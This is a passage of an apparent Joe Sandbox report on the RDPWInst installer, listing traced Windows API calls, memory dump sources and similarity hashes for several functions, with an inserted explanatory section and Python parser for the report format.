                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$InfoThread
                                                    • String ID: eeee$ggg$yyyy
                                                    • API String ID: 4232894706-1253427255
                                                    • Opcode ID: f0e1bd095bade663e8df46e19b5da6729160b75494cb6633c971c77849839ccd
                                                    • Instruction ID: b43ca61d4524358572b11bc7e7a437c5213401559800a2754e6fdc13831cf262
                                                    • Opcode Fuzzy Hash: f0e1bd095bade663e8df46e19b5da6729160b75494cb6633c971c77849839ccd
                                                    • Instruction Fuzzy Hash: 97519835B00105ABDB10EF69C8425DEB7B5EF84305B21807BA401E73AADB7CDF92965D
                                                    APIs
                                                    • GetThreadLocale.KERNEL32(00000000,00412E17,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412D20
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LocaleThread
                                                    • String ID: 0\D$`\D$|\D
                                                    • API String ID: 635194068-1443555069
                                                    • Opcode ID: 0cc7b5f362df3f3b22b96f6267770b75cfda245be271edcbb912247af85876fd
                                                    • Instruction ID: 0f9472f532bfb6d97ff063cc401fba787666d5dde08e68930300e7878c0b733c
                                                    • Opcode Fuzzy Hash: 0cc7b5f362df3f3b22b96f6267770b75cfda245be271edcbb912247af85876fd
                                                    • Instruction Fuzzy Hash: 0831E871F006086BDB04DA55D891BAF73B9DB88314F65803BFA05E7382D67CED5183A8
                                                    APIs
                                                    • GetThreadLocale.KERNEL32(00000000,00412E17,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412D20
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LocaleThread
                                                    • String ID: 0\D$`\D$|\D
                                                    • API String ID: 635194068-1443555069
                                                    • Opcode ID: c41b53ad99340a58dd1ea3df1ca7b54c87d2f8ec0189060bbe7d6b41ea99f8a8
                                                    • Instruction ID: e329392f02449b06687ba54e558461cdf4d213220e6431f4601da2913400d418
                                                    • Opcode Fuzzy Hash: c41b53ad99340a58dd1ea3df1ca7b54c87d2f8ec0189060bbe7d6b41ea99f8a8
                                                    • Instruction Fuzzy Hash: A631E871F006086BDB04DA45D891BAF73B9DB88314F65803BFA05E7382D67CED5183A8
                                                    APIs
                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00411595), ref: 0041152C
                                                    • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00411595), ref: 00411532
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DateFormatLocaleThread
                                                    • String ID: $yyyy
                                                    • API String ID: 3303714858-404527807
                                                    • Opcode ID: 5e56a81e6ec8d75afdc6e5fb3bd2dd6b96c822b9e08f0a8d12efe2345fd405b1
                                                    • Instruction ID: 4e3523b49621e94f0abc5fe99f3e528012799777c4c12a7b6b737367db96c017
                                                    • Opcode Fuzzy Hash: 5e56a81e6ec8d75afdc6e5fb3bd2dd6b96c822b9e08f0a8d12efe2345fd405b1
                                                    • Instruction Fuzzy Hash: 8F219531A00118ABD710EF55C941AEEB3FAEF48300F514077F905E72A1D6389E40C7A9
                                                    APIs
                                                    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: $sD$%ProgramFiles%$%ProgramW6432%
                                                    • API String ID: 237503144-3145546840
                                                    • Opcode ID: c5f063dfebfa4231b205ec39474c4c55e757e18b534536750d11f4516631b0cd
                                                    • Instruction ID: dfc59d650baf98a512f6366ea296a42dbe4730e7440a0cbc8b484aecff229b80
                                                    • Opcode Fuzzy Hash: c5f063dfebfa4231b205ec39474c4c55e757e18b534536750d11f4516631b0cd
                                                    • Instruction Fuzzy Hash: 411184B0604168ABD714EB65CD92A9DB7B9DB48304F5140BBA205F3292DB38EE558B1C
                                                    APIs
                                                    • FindResourceW.KERNEL32(00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AEC0
                                                    • LoadResource.KERNEL32(00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AED7
                                                    • LockResource.KERNEL32(00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AEE8
                                                      • Part of subcall function 00415A68: GetLastError.KERNEL32(0040AEF9,00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 00415A68
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Resource$ErrorFindLastLoadLock
                                                    • String ID: CHARTABLE
                                                    • API String ID: 1074440638-2668339182
                                                    • Opcode ID: 2576ac7df62392cdd79f5341252eb240a6292d2d2deea21fb17a0e0107b6f450
                                                    • Instruction ID: 0ebed5ed6e5dda7701dd75a560580c35c1b3b1e5272f816bd12d169416f3b400
                                                    • Opcode Fuzzy Hash: 2576ac7df62392cdd79f5341252eb240a6292d2d2deea21fb17a0e0107b6f450
                                                    • Instruction Fuzzy Hash: 4E0180B87803018FC718EF59D8D1A9A73E9AB99320709453EE241577A1CF3C9C40DB59
                                                    APIs
                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00419633
                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0041964F
                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004196C6
                                                    • VariantClear.OLEAUT32(?), ref: 004196EF
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ArraySafe$Bound$ClearIndexVariant
                                                    • String ID:
                                                    • API String ID: 920484758-0
                                                    • Opcode ID: 0f680bb846408bca051d329f0f9141866d040382b2d86f627a051af50f217def
                                                    • Instruction ID: d3a60771d8c98d42dda0da8010ad17e71a6e6e293320ab5b6f42a6f3f22a61d9
                                                    • Opcode Fuzzy Hash: 0f680bb846408bca051d329f0f9141866d040382b2d86f627a051af50f217def
                                                    • Instruction Fuzzy Hash: F7410D75A0061D9FCB61DF59CC90BD9B3FCAB48314F0055DAE549A7212DA38AFC18F64
                                                    APIs
                                                    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,00413408), ref: 0041328F
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004132B3
                                                    • GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 004132CE
                                                    • LoadStringW.USER32(00000000,0000FFE5,?,00000100), ref: 00413369
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                    • String ID:
                                                    • API String ID: 3990497365-0
                                                    • Opcode ID: b4db8f4b60a4758e302225d89cd2c63d37b5a2fd60e804dc2dc20906c96adb53
                                                    • Instruction ID: 83055b0679be0c1ffa726a7bf1997f9f19e1454b2f4a6b728642dd338ff24854
                                                    • Opcode Fuzzy Hash: b4db8f4b60a4758e302225d89cd2c63d37b5a2fd60e804dc2dc20906c96adb53
                                                    • Instruction Fuzzy Hash: 80412070A003589FDB20EF59CC81BCAB7B9AB49304F0040FAE508E7251DB7A9E94CF59
                                                    APIs
                                                    • GetThreadUILanguage.KERNEL32(?,00000000), ref: 00408B19
                                                    • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 00408B7B
                                                    • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 00408BD8
                                                    • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 00408C0B
                                                      • Part of subcall function 00408AC4: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,00408B89), ref: 00408ADB
                                                      • Part of subcall function 00408AC4: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,00408B89), ref: 00408AF8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Thread$LanguagesPreferred$Language
                                                    • String ID:
                                                    • API String ID: 2255706666-0
                                                    • Opcode ID: 57ba5b2eaa9ba2f7f394178960eeeee68cc8fe68392739164dda0304afca2262
                                                    • Instruction ID: ba3eb85df9a642da38a4383696d7f270617e705f6d5ccbab9dd9f20305666083
                                                    • Opcode Fuzzy Hash: 57ba5b2eaa9ba2f7f394178960eeeee68cc8fe68392739164dda0304afca2262
                                                    • Instruction Fuzzy Hash: 5A317C70A1021A9BDB00DFE9C885AAEB3B5FF44304F00457AE991E72D1DB78AE44CB58
                                                    APIs
                                                    • FindResourceW.KERNEL32(00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8,?,0044BFA8,00000000,?,0043CEE1), ref: 0042FB5F
                                                    • LoadResource.KERNEL32(00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8,?,0044BFA8,00000000), ref: 0042FB79
                                                    • SizeofResource.KERNEL32(00400000,0042FBE4,00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8), ref: 0042FB93
                                                    • LockResource.KERNEL32(0042F774,00000000,00400000,0042FBE4,00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000), ref: 0042FB9D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Resource$FindLoadLockSizeof
                                                    • String ID:
                                                    • API String ID: 3473537107-0
                                                    • Opcode ID: 6ebdd4f1cd543b76a016c77fc1286a410c61f79913e5f64509fe1404532659ad
                                                    • Instruction ID: 2319d0df2cd87803d0a75df5626f4cddb48e3135002f19a9a4d545a6677a7621
                                                    • Opcode Fuzzy Hash: 6ebdd4f1cd543b76a016c77fc1286a410c61f79913e5f64509fe1404532659ad
                                                    • Instruction Fuzzy Hash: 49F06DB37012146F9745EEADA881D6B77FDEE88264390017FFA08D7202DA38ED154379
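The function entries above all follow one layout: an "APIs" list of traced calls with their call-site address, an optional "Strings" block, the memory dumps the code was recovered from, and the Similarity identifiers (API ID, String ID, Opcode ID and the two fuzzy hashes) that let you match the same routine across samples. The parser below is an added example for working with that layout; it is not part of the Joe Sandbox report or of RDPWrap. The SAMPLE text is constructed from two of this page's own entries (the ExpandEnvironmentStringsW entry and the CHARTABLE resource entry), shortened to a single "Associated" dump line each; the field names and regular expressions are my reading of the format, not a documented Joe Sandbox schema.

```python
"""Parse Joe Sandbox IDA-plugin function entries into structured records.

Added example, not Joe Sandbox or RDPWrap code. SAMPLE is constructed from two
entries on this report page, each cut down to one 'Associated' dump line.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# A traced call: "• Name.MODULE(arg,arg,...), ref: ADDR", optionally prefixed
# with "Part of subcall function XXXXXXXX:" when the call sits in a callee.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Every other bullet is a "Key: value" field (Source File, Opcode ID, ...).
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<value>.*)$")
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                      # call-site address inside the dumped image
    parent: Optional[str] = None  # set when the report marks it as a subcall


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    dumps: List[str] = field(default_factory=list)    # associated .sdmp names
    fields: Dict[str, str] = field(default_factory=dict)


def parse_report(text: str) -> List[FunctionRecord]:
    """Return one FunctionRecord per 'APIs' block in the report text."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                      # each function entry opens with this header
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None or not line or line in SECTION_HEADERS:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            current.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                        int(m.group("ref"), 16), m.group("parent")))
            continue
        m = KV_RE.match(line)
        if not m:
            continue
        key, value = m.group("key"), m.group("value")
        if key == "Associated":
            # The HTML export fuses the "Download File" link text onto the dump name.
            current.dumps.append(value.removesuffix("Download File"))
        elif key == "String ID":
            # Referenced strings are joined with '$'; a leading '$' therefore
            # yields an empty first element, kept so positions stay stable.
            current.strings = value.split("$") if value else []
        else:
            current.fields[key] = value
    return records


def calls_by_api(records: List[FunctionRecord]) -> Dict[str, List[int]]:
    """Map each API name to the call-site addresses that invoke it."""
    index: Dict[str, List[int]] = {}
    for rec in records:
        for call in rec.apis:
            index.setdefault(call.name, []).append(call.ref)
    return index


SAMPLE = """\
APIs
• ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
Strings
Memory Dump Source
• Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
Similarity
• API ID: EnvironmentExpandStrings
• String ID: $sD$%ProgramFiles%$%ProgramW6432%
• Opcode ID: c5f063dfebfa4231b205ec39474c4c55e757e18b534536750d11f4516631b0cd
APIs
• FindResourceW.KERNEL32(00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AEC0
• LoadResource.KERNEL32(00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AED7
• LockResource.KERNEL32(00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AEE8
  • Part of subcall function 00415A68: GetLastError.KERNEL32(0040AEF9,00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 00415A68
Similarity
• API ID: Resource$ErrorFindLastLoadLock
• String ID: CHARTABLE
• Opcode ID: 2576ac7df62392cdd79f5341252eb240a6292d2d2deea21fb17a0e0107b6f450
"""

if __name__ == "__main__":
    for rec in parse_report(SAMPLE):
        print(rec.fields.get("Opcode ID", "")[:16], [c.name for c in rec.apis], rec.strings)
```

Feeding the whole report section through `parse_report` gives one record per function; `calls_by_api` then answers questions such as "which call sites load resources" without scrolling the dump, and the `Opcode ID` / `Instruction Fuzzy Hash` fields can be diffed against another sample's report to see which RDPWInst routines are shared.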
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(00449C1C), ref: 0040A0F8
                                                    • lstrcmpiA.KERNEL32(?,?), ref: 0040A10E
                                                    • LeaveCriticalSection.KERNEL32(00449C1C,00449C1C), ref: 0040A143
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeavelstrcmpi
                                                    • String ID: YD
                                                    • API String ID: 2420758022-4277794568
                                                    • Opcode ID: 0b44f2d380ec5fe545f4f2e3965f64519b1ec05f6d6c381fa1d4a9968702bb33
                                                    • Instruction ID: abf7b61c1320a37f19f23f54b7b1c16b8e1f28cb69a34480c51c1f01e8ca554a
                                                    • Opcode Fuzzy Hash: 0b44f2d380ec5fe545f4f2e3965f64519b1ec05f6d6c381fa1d4a9968702bb33
                                                    • Instruction Fuzzy Hash: 8AF062322003145BEF106A619CC2B1677989F15714F100037FB007F2C3D6BC9C60466F
                                                    APIs
                                                    • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00405A9A
                                                    Strings
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID: $$@
                                                    • API String ID: 3192549508-1194432280
                                                    • Opcode ID: ffbabee0d71fd2b7d8fc05915f2ca3a30f23b11c7e3ffcedbc7f052df7b7c5c2
                                                    • Instruction ID: fff674c7101e68f6d73d2d8a69124ddc370c84ad249f2bdacb9cff7d7fa155c1
                                                    • Opcode Fuzzy Hash: ffbabee0d71fd2b7d8fc05915f2ca3a30f23b11c7e3ffcedbc7f052df7b7c5c2
                                                    • Instruction Fuzzy Hash: 1C418C75304A019FD720DB14D884B2BB7A5EB89314F69867AF444AB392C738EC41CF69
                                                    APIs
                                                    • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00405906
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_0000589C), ref: 00405943
                                                    Strings
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID: $$@
                                                    • API String ID: 3192549508-1194432280
                                                    • Opcode ID: 23fdc1c80813b7a19c68f0c79cc3fa5e3fa91e7525bef4bca6a264e8681dbcfb
                                                    • Instruction ID: 4b325d1a8302ad8f82e944498d23502563e7d009f61a8d4e6d3783212fd5e4e2
                                                    • Opcode Fuzzy Hash: 23fdc1c80813b7a19c68f0c79cc3fa5e3fa91e7525bef4bca6a264e8681dbcfb
                                                    • Instruction Fuzzy Hash: 533141B4604700EFD720DB10D888B6BBBA9EB84724F54857AF448A7291C738EC40CF69
                                                    APIs
                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00411595), ref: 0041152C
                                                    • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00411595), ref: 00411532
                                                    Strings
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DateFormatLocaleThread
                                                    • String ID:
                                                    • API String ID: 3303714858-3916222277
                                                    • Opcode ID: 0d5b63d8b5d64c377b747a6270c18780734cafdd64312a6cbce0b29c00a6c7cf
                                                    • Instruction ID: da40258a30b1bf54e866a7fbbaf5cc9082ba5d6ba5cf06b5a9e2a769468a01f6
                                                    • Opcode Fuzzy Hash: 0d5b63d8b5d64c377b747a6270c18780734cafdd64312a6cbce0b29c00a6c7cf
                                                    • Instruction Fuzzy Hash: 2C21BB31A04254AFC711DF64C8556EA77B5EF49300F4140A7FD45E72A1D6389E50C7AA
                                                    APIs
                                                    • GetThreadLocale.KERNEL32 ref: 00415102
                                                    • GetSystemMetrics.USER32(0000004A), ref: 00415153
                                                    Strings
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LocaleMetricsSystemThread
                                                    • String ID: p[D
                                                    • API String ID: 3035471613-2202972244
                                                    • Opcode ID: da98f0b9cf3a04fcb2a289a8677121395d8df8e9f207d3304538472cbe0e1366
                                                    • Instruction ID: 0794bcb2409efff6a4af82a72d6dc306925be2e2831a755ee0de451743422fb7
                                                    • Opcode Fuzzy Hash: da98f0b9cf3a04fcb2a289a8677121395d8df8e9f207d3304538472cbe0e1366
